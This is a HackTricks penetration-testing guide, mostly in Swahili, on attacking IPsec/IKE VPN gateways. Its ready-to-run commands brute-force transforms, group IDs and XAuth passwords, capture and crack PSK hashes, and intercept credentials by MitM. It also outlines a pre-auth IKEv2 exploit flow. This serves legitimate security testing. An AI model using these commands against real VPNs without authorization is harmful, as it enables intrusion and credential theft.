500/udp - Pentesting IPsec/IKE VPN

Tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

Taarifa za Msingi

IPsec inatambuliwa sana kama teknolojia kuu ya kulinda mawasiliano kati ya mitandao (LAN-to-LAN) na kutoka kwa watumiaji wa mbali hadi lango la mtandao (remote access), ikitumika kama mgongo wa suluhisho za VPN za kampuni.

Uanzishaji wa security association (SA) kati ya pointi mbili unasimamiwa na IKE, ambayo inafanya kazi chini ya mwavuli wa ISAKMP, itifaki iliyoundwa kwa ajili ya uthibitisho na kubadilishana funguo. Mchakato huu unafanyika katika hatua kadhaa:

  • Phase 1: Kanal salama huanzishwa kati ya endpoints mbili. Hii hufikiwa kwa matumizi ya Pre-Shared Key (PSK) au vyeti, kwa kutumia either main mode, ambayo inahusisha jozi tatu za ujumbe, au aggressive mode.
  • Phase 1.5: Ingawa si lazima, awamu hii, inayojulikana kama Extended Authentication Phase, inathibitisha utambulisho wa mtumiaji anayejaribu kuungana kwa kuhitaji jina la mtumiaji na nywila.
  • Phase 2: Awamu hii inajikita kwenye kujadiliana vigezo vya kulinda data kwa kutumia ESP na AH. Inaruhusu matumizi ya algoriti tofauti na zile za Phase 1 ili kuhakikisha Perfect Forward Secrecy (PFS), ikiongeza usalama.

Bandari ya chaguo-msingi: 500/udp

Pia mara nyingi wazi: 4500/udp (NAT Traversal)

Gundua huduma kwa kutumia nmap

root@bt:~# nmap -sU -p 500 172.16.21.200
Starting Nmap 5.51 (http://nmap.org) at 2011-11-26 10:56 IST
Nmap scan report for 172.16.21.200
Host is up (0.00036s latency).
PORT    STATE SERVICE
500/udp open  isakmp
MAC Address: 00:1B:D5:54:4D:E4 (Cisco Systems)

Kupata transformation halali

Usanidi wa IPSec unaweza kuandaliwa ili kupokea transformation moja au machache tu. Transformation ni mchanganyiko wa thamani. Each transform ina idadi ya sifa kama DES au 3DES kama encryption algorithm, SHA au MD5 kama integrity algorithm, pre-shared key kama authentication type, Diffie-Hellman 1 au 2 kama key distribution algorithm na 28800 sekunde kama lifetime.

Kisha, jambo la kwanza unalotakiwa kufanya ni kutafuta valid transformation, ili server itakubali kuwasiliana nawe. Kufanya hivyo, unaweza kutumia zana ike-scan. Kwa chaguo-msingi, Ike-scan inafanya kazi katika main mode, na inatuma packet kwa gateway yenye kichwa cha ISAKMP na proposal moja yenye nane transforms ndani yake.

Kulingana na majibu unaweza kupata baadhi ya taarifa kuhusu endpoint:

root@bt:~# ike-scan -M 172.16.21.200
Starting ike-scan 1.9 with 1 hosts (http://www.nta-monitor.com/tools/ike-scan/)
172.16.21.200    Main Mode Handshake returned
HDR=(CKY-R=d90bf054d6b76401)
SA=(Enc=3DES Hash=SHA1 Group=2:modp1024 Auth=PSK LifeType=Seconds LifeDuration=28800)
VID=4048b7d56ebce88525e7de7f00d6c2d3c0000000 (IKE Fragmentation)

Ending ike-scan 1.9: 1 hosts scanned in 0.015 seconds (65.58 hosts/sec). 1 returned handshake; 0 returned notify

Kama unavyoona katika jibu la awali, kuna uwanja uitwao AUTH wenye thamani PSK. Hii ina maana kwamba vpn imewekwa kwa kutumia preshared key (na hili ni zuri sana kwa pentester).\
Thamani ya mstari wa mwisho pia ni muhimu sana:

  • 0 returned handshake; 0 returned notify: Hii ina maana lengo ni not an IPsec gateway.
  • 1 returned handshake; 0 returned notify: Hii ina maana target is configured for IPsec and is willing to perform IKE negotiation, and either one or more of the transforms you proposed are acceptable (a valid transform will be shown in the output).
  • 0 returned handshake; 1 returned notify: VPN gateways hujibu kwa notify message wakati none of the transforms are acceptable (ingawa baadhi ya gateways hazifanyi hivyo, katika kesi hiyo uchambuzi zaidi na pendekezo lililorekebishwa linapaswa kujaribiwa).

Kisha, katika kesi hii tayari tuna valid transformation, lakini ikiwa uko katika kesi ya tatu, utahitaji brute-force a little bit to find a valid transformation:

Kwanza kabisa unahitaji kuunda transformations zote zinazowezekana:

for ENC in 1 2 3 4 5 6 7/128 7/192 7/256 8; do for HASH in 1 2 3 4 5 6; do for AUTH in 1 2 3 4 5 6 7 8 64221 64222 64223 64224 65001 65002 65003 65004 65005 65006 65007 65008 65009 65010; do for GROUP in 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18; do echo "--trans=$ENC,$HASH,$AUTH,$GROUP" >> ike-dict.txt ;done ;done ;done ;done

Kisha fanya brute-force kila moja kwa kutumia ike-scan (hii inaweza kuchukua dakika kadhaa):

while read line; do (echo "Valid trans found: $line" && sudo ike-scan -M $line <IP>) | grep -B14 "1 returned handshake" | grep "Valid trans found" ; done < ike-dict.txt

Ikiwa brute-force haikufanya kazi, labda seva inajibu bila handshakes hata kwa transforms halali. Kisha, unaweza kujaribu brute-force ile ile lakini ukitumia aggressive mode:

while read line; do (echo "Valid trans found: $line" && ike-scan -M --aggressive -P handshake.txt $line <IP>) | grep -B7 "SA=" | grep "Valid trans found" ; done < ike-dict.txt

Kwa matumaini mabadiliko halali yatarejeshwa.
Unaweza kujaribu shambulio lile lile ukitumia iker.py.
Unaweza pia kujaribu brute force mabadiliko kwa kutumia ikeforce:

./ikeforce.py <IP> # No parameters are required for scan -h for additional help

Katika DH Group: 14 = 2048-bit MODP and 15 = 3072-bit
2 = HMAC-SHA = SHA1 (katika kesi hii). The --trans format is $Enc,$Hash,$Auth,$DH

Cisco inaonyesha kuepuka kutumia DH groups 1 na 2 kwa sababu hazitoshi kuwa imara. Wataalamu wanaamini kwamba mataifa yenye rasilimali nyingi yanaweza kwa urahisi kuvunja encryption ya data inayotumia makundi haya dhaifu. Hii hufanyika kwa kutumia mbinu maalum inayowaandaa waweze crack codes kwa haraka. Ingawa inagharimu pesa nyingi kuanzisha mbinu hii, inawawezesha mataifa hayo yenye nguvu kusoma data iliyofichwa (encrypted) kwa wakati halisi ikiwa inatumia group isiyo imara (kama 1,024-bit au ndogo).

Server fingerprinting

Kisha, unaweza kutumia ike-scan kujaribu gundua mtengenezaji wa kifaa. Chombo hicho hutuma pendekezo la awali kisha linasimama ku-replay. Kisha, kitachambua tofauti za muda kati ya ujumbe uliopewa kutoka kwa seva na muundo wa majibu unaolingana; pentester anaweza kwa mafanikio fingerprint mtengenezaji wa gateway ya VPN. Zaidi ya hayo, baadhi ya VPN servers hutumia hiari ya Vendor ID (VID) payload pamoja na IKE.

Taja transformation inayokubalika ikiwa inahitajika (using ā€“trans)

Kama IKE itagundua ni mtengenezaji gani, itachapisha:

root@bt:~# ike-scan -M --showbackoff 172.16.21.200
Starting ike-scan 1.9 with 1 hosts (http://www.nta-monitor.com/tools/ike-scan/)
172.16.21.200    Main Mode Handshake returned
HDR=(CKY-R=4f3ec84731e2214a)
SA=(Enc=3DES Hash=SHA1 Group=2:modp1024 Auth=PSK LifeType=Seconds LifeDuration=28800)
VID=4048b7d56ebce88525e7de7f00d6c2d3c0000000 (IKE Fragmentation)

IKE Backoff Patterns:

IP Address       No.  Recv time            Delta Time
172.16.21.200    1    1322286031.744904    0.000000
172.16.21.200    2    1322286039.745081    8.000177
172.16.21.200    3    1322286047.745989    8.000908
172.16.21.200    4    1322286055.746972    8.000983
172.16.21.200    Implementation guess: Cisco VPN Concentrator

Ending ike-scan 1.9: 1 hosts scanned in 84.080 seconds (0.01 hosts/sec). 1 returned handshake; 0 returned notify

Hii pia inaweza kufikiwa kwa kutumia nmap script ike-version

Maalum kwa IKEv2: WatchGuard Vendor ID version fingerprinting

Baadhi ya daemons za IKEv2 zinaweza kujumuisha Vendor ID payloads zisizo za kawaida katika jibu la IKE_SA_INIT. WatchGuard Fireware OS huweka appliance version/build moja kwa moja ndani ya VID, ikiruhusu single-packet, pre-auth fingerprinting.

  • Usafirishaji: UDP/500 (na UDP/4500 kwa NAT-T)
  • Packet: jibu la IKE_SA_INIT lina Vendor ID payloads moja au zaidi
  • WatchGuard format: 32-byte hash ikifuatiwa na base64 ambayo inatafsiriwa kuwa kwa mfano VN=12.11.3 BN=719894

Mfano wa raw bytes kutoka WatchGuard VID payload (12 za mwisho ni base64):

00000000: bfc2 2e98 56ba 9936 11c1 1e48 a6d2 0807  ....V..6...H....
00000010: a95b edb3 9302 6a49 e60f ac32 7bb9 601b  .[....jI...2{.`.
00000020: 566b 3439 4d54 4975 4d54 4575 4d79 4243  Vk49MTIuMTEuMyBC
00000030: 546a 3033 4d54 6b34 4f54 513d            Tj03MTk4OTQ=

Uchimbaji wa haraka kwenye shell wakati una base64 tail:

echo 'Vk49MTIuMTEuMyBCTj03MTk4OTQ=' | base64 -d
# VN=12.11.3 BN=719894

Vidokezo

  • Hii si sehemu ya RFC yoyote ya IKEv2. Imechukuliwa kama tabia ya muuzaji kwa ajili ya kugundua kwa haraka matoleo ya Fireware OS yaliyo wazi/yanayoweza kushambuliwa.
  • Unahitaji tu kuleta jibu la IKE_SA_INIT; uthibitisho hauhitajiki.

Kupata ID sahihi (jina la kundi)

Ili kuruhusiwa kunasa hash unahitaji transformation halali inayounga mkono Aggressive mode na ID sahihi (jina la kundi). Huenda haufahamu jina sahihi la kundi, hivyo utalazimika kufanya brute-force.
Kwa kufanya hivyo, ninapendekeza mbinu 2:

Bruteforcing ID with ike-scan

Kwanza kabisa jaribu kufanya ombi kwa kutumia ID bandia ili kupata hash (ā€œ-Pā€):

ike-scan -P -M -A -n fakeID <IP>

Ikiwa no hash is returned, basi huenda njia hii ya brute forcing itafanya kazi. Ikiwa hash fulani inarudishwa, ina maana kuwa fake hash itarudishwa kwa fake ID, hivyo njia hii haitakuwa ya kuaminika kutekeleza brute-force ya ID. Kwa mfano, fake hash inaweza kurudishwa (hii hutokea katika toleo za kisasa):

Lakini kama nilivyosema, ikiwa hakuna hash inayorudishwa, basi unapaswa kujaribu brute-force common group names kwa kutumia ike-scan.

Script hii itajaribu brute-force possible IDs na itarudisha IDs ambapo handshake halali inarudishwa (hii itakuwa group name halali).

Ikiwa umegundua transformation maalum, iiweke kwenye amri ya ike-scan. Na ikiwa umegundua transformations kadhaa, jisikie huru kuongeza loop mpya kujaribu zote (unapaswa kujaribu zote mpaka moja ikafanya kazi ipasavyo).

Unaweza kutumia the dictionary of ikeforce or the one in seclists of common group names to brute-force them:

while read line; do (echo "Found ID: $line" && sudo ike-scan -M -A -n $line <IP>) | grep -B14 "1 returned handshake" | grep "Found ID:"; done < /usr/share/wordlists/external/SecLists/Miscellaneous/ike-groupid.txt

Bruteforcing ID na Iker

iker.py pia hutumia ike-scan ili bruteforce majina ya vikundi yanayowezekana. Inafuata mbinu yake mwenyewe ili kupata ID halali kwa kuzingatia matokeo ya ike-scan.

Bruteforcing ID na ikeforce

ikeforce.py ni chombo kinachoweza kutumiwa ku brute force IDs pia. Chombo hiki kita jaribu ku-exploit udhaifu mbalimbali ambazo zinaweza kutumika kutofautisha kati ya ID halali na isiyo halali (inaweza kuwa na false positives na false negatives, ndiyo maana napendelea kutumia njia ya ike-scan inapowezekana).

Kwa default ikeforce itatuma mwanzoni baadhi ya ids za nasibu ili kukagua tabia ya server na kuamua taktiki ya kutumia.

  • The first method is to brute-force the group names by searching for the information Dead Peer Detection DPD of Cisco systems (this info is only replayed by the server if the group name is correct).
  • The second method available is to checks the number of responses sent to each try because sometimes more packets are sent when the correct id is used.
  • The third method consist on searching for ā€œINVALID-ID-INFORMATIONā€ in response to incorrect ID.
  • Finally, if the server does not replay anything to the checks, ikeforce will try to brute force the server and check if when the correct id is sent the server replay with some packet.
    Obviously, the goal of brute forcing the id is to get the PSK when you have a valid id. Then, with the id and PSK you will have to bruteforce the XAUTH (if it is enabled).

If you have discovered an specific transformation add it in the ikeforce command. And if you have discovered several transformations feel free to add a new loop to try them all (you should try them all until one of them is working properly).

git clone https://github.com/SpiderLabs/ikeforce.git
pip install 'pyopenssl==17.2.0' #It is old and need this version of the library

./ikeforce.py <IP> -e -w ./wordlists/groupnames.dic

Sniffing ID

(From the book Network Security Assessment: Know Your Network): Pia inawezekana kupata valid usernames kwa sniffing muunganisho kati ya VPN client na server, kwa kuwa packet ya kwanza ya aggressive mode yenye client ID imetumwa wazi

Capturing & cracking the hash

Hatimaye, ikiwa umepata valid transformation na group name na ikiwa aggressive mode inaruhusiwa, basi unaweza kwa urahisi kupata crackable hash:

ike-scan -M -A -n <ID> --pskcrack=hash.txt <IP> #If aggressive mode is supported and you know the id, you can get the hash of the passwor

Hash itahifadhiwa ndani ya hash.txt.

Unaweza kutumia psk-crack, john (ukitumia ikescan2john.py) na hashcat ili kucrack hash:

psk-crack -d <Wordlist_path> psk.txt

XAuth

Aggressive mode IKE iliyounganishwa na Pre-Shared Key (PSK) hutumika mara nyingi kwa madhumuni ya group authentication. Njia hii inaongezwa na XAuth (Extended Authentication), ambayo huweka safu ya ziada ya user authentication. Uthibitishaji kama huu kwa kawaida hutegemea huduma kama Microsoft Active Directory, RADIUS, au mifumo inayofanana.

Katika mpito wa IKEv2, kuna mabadiliko ambapo EAP (Extensible Authentication Protocol) inatumika badala ya XAuth kwa ajili ya kuthibitisha watumiaji. Mabadiliko haya yanaonyesha mageuzi katika mbinu za uthibitishaji ndani ya itifaki za mawasiliano salama.

MitM ya mtandao wa ndani ili kunasa credentials

Ili unaweza kunasa data za kuingia ukitumia fiked na kuona kama kuna username ya default (Unahitaji kupitisha trafiki ya IKE kwenda fiked kwa ajili ya sniffing, jambo ambalo linaweza kufanywa kwa msaada wa ARP spoofing, more info). Fiked itafanya kazi kama VPN endpoint na itakamata XAuth credentials:

fiked -g <IP> -k testgroup:secretkey -l output.txt -d

Vilevile, ukitumia IPSec jaribu kufanya MitM attack na kuzuia trafiki yote kwa port 500. Ikiwa IPSec tunnel haiwezi kuanzishwa, trafiki inaweza kutumwa wazi.

Brute-forcing XAUTH username na password with ikeforce

To brute force the XAUTH (unapojua jina halali la kikundi id na psk) unaweza kutumia username au orodha ya usernames na orodha ya passwords:

./ikeforce.py <IP> -b -i <group_id> -u <username> -k <PSK> -w <passwords.txt> [-s 1]

Kwa njia hii, ikeforce itajaribu kuunganishwa kwa kutumia kila mchanganyiko wa username:password.

Ikiwa umepata moja au zaidi ya transforms halali, zitumie tu kama katika hatua za awali.

Uthibitishaji na VPN ya IPSEC

In Kali, VPNC inatumika kuanzisha tunnels za IPsec. The profiles lazima ziwe katika saraka /etc/vpnc/. Unaweza kuanzisha profiles hizi kwa kutumia amri vpnc.

Amri na usanidi zifuatazo zinaonyesha mchakato wa kuanzisha muunganisho wa VPN kwa VPNC:

root@system:~# cat > /etc/vpnc/samplevpn.conf << STOP
IPSec gateway [VPN_GATEWAY_IP]
IPSec ID [VPN_CONNECTION_ID]
IPSec secret [VPN_GROUP_SECRET]
IKE Authmode psk
Xauth username [VPN_USERNAME]
Xauth password [VPN_PASSWORD]
STOP
root@system:~# vpnc samplevpn
VPNC started in background (pid: [PID])...
root@system:~# ifconfig tun0

Katika mpangilio huu:

  • Badilisha [VPN_GATEWAY_IP] na anwani halisi ya IP ya gateway ya VPN.
  • Badilisha [VPN_CONNECTION_ID] na kitambulisho cha muunganiko wa VPN.
  • Badilisha [VPN_GROUP_SECRET] na group secret ya VPN.
  • Badilisha [VPN_USERNAME] na [VPN_PASSWORD] na nywila za uthibitishaji za VPN.
  • [PID] inaashiria process ID itakayotolewa wakati vpnc inapoanzisha.

Hakikisha kwamba thamani halisi, salama zinatumiwa kubadilisha placeholders wakati wa kusanidi VPN.

IKEv2 exploitation notes: pre-auth IDi/CERT processing bugs

Vifaa vya kisasa vya VPN mara nyingi huonyesha IKEv2 kwenye UDP/500 (na UDP/4500 kwa NAT-T). Uso wa kawaida wa shambulio kabla ya uthibitishaji ni parsing ya Identification (IDi) na Certificate payloads wakati wa IKE_SA_AUTH.

Mtiririko wa juu wa unyonyaji wakati parser dhaifu wa IKEv2 upo:

  • Tuma IKE_SA_INIT halali ili kujadiliana transforms na kukamilisha Diffieā€“Hellman.
  • Fuata na IKE_SA_AUTH yenye IDi inayosababisha mdudu (kwa mfano, Identification yenye ukubwa kupindukia iliyokopwa kwenye buffer ya stack yenye ukubwa thabiti kabla ya certificate validation).
  • Uharibifu wa kumbukumbu unaotokana unaweza kutoa udhibiti wa saved-register na return-address.
  • Ukiwa na NX imewezeshwa lakini kinga nyingine zikikosekana (hakuna PIE/canaries), jenga ROP chain kupiga mprotect kwenye ukurasa wa stack kisha punguza utekelezaji kwa shellcode iliyochanganywa au kwa interpreter aliye katika mfumo (mfano, /usr/bin/python3) ikiwa hakuna /bin/sh inapatikana.

Example default transforms observed on some IKEv2 appliances (WatchGuard Fireware OS 12.11.3):

  • SHA2-256ā€“AES(256-bit) with DH Group 14
  • SHA1ā€“AES(256-bit) with DH Group 5
  • SHA1ā€“AES(256-bit) with DH Group 2
  • SHA1ā€“3DES with DH Group 2

Vidokezo vya vitendo

  • Lenga UDP/500 na UDP/4500; NAT-T servers zinaweza kujibu kwenye 4500 pekee.
  • Ongeza receive buffer na timeouts kwa scanners za UDP ili kuepuka kupoteza packet.
  • Ikiwa service inaonyesha custom Vendor IDs (see section above), tumia ili haraka fingerprint versions zilizoathirika kabla ya kujaribu exploit traffic yoyote.

Reference Material

Shodan

  • port:500 IKE
  • port:4500 "UDP"
  • udp port:500,4500 "WatchGuard"

References

Tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks